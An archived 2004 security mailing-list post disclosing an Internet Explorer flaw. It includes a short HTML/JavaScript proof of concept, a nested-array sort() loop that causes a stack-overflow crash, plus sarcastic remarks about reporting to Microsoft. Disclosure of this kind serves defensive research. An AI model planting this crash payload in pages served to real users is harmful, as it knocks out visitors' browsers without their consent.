MSIE flaws: nested array sort() loop Stack overflow exception

From: Berend-Jan Wever (skylined_at_edup.tudelft.nl)
Date: 11/25/04

  • Next message: Brett Moore: "Winamp - Buffer Overflow In IN_CDDA.dll [Unpatched]"
    To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>
    Date: Thu, 25 Nov 2004 01:41:20 +0100
    
    

    Hi all,

    Another flaw in IE:

    <HTML>
      <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
      <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
    </HTML>

    Normally I would see if it's exploitable but I figure I'm not MS's pet bug finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know their own product better then I do and can analyse the problem much faster. So if you want to know the impact of this vulnerability, ask them: I'm sure they will be more then willing to help you. I'm sure they will even reply to this message with technical details and a patch tomorrow.

    Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_ie_flaws.html

    Cheers,
    SkyLined
    http://www.edup.tudelft.nl/~bjwever

    PS. Don't think firefox will keep you save from hackers, I _know_ it won't ;) But more on that later...
    PS2. Recursive function call will cause stack overflow causing write exception in guard page on a push, no control over registers.


  • Next message: Brett Moore: "Winamp - Buffer Overflow In IN_CDDA.dll [Unpatched]"

    Relevant Pages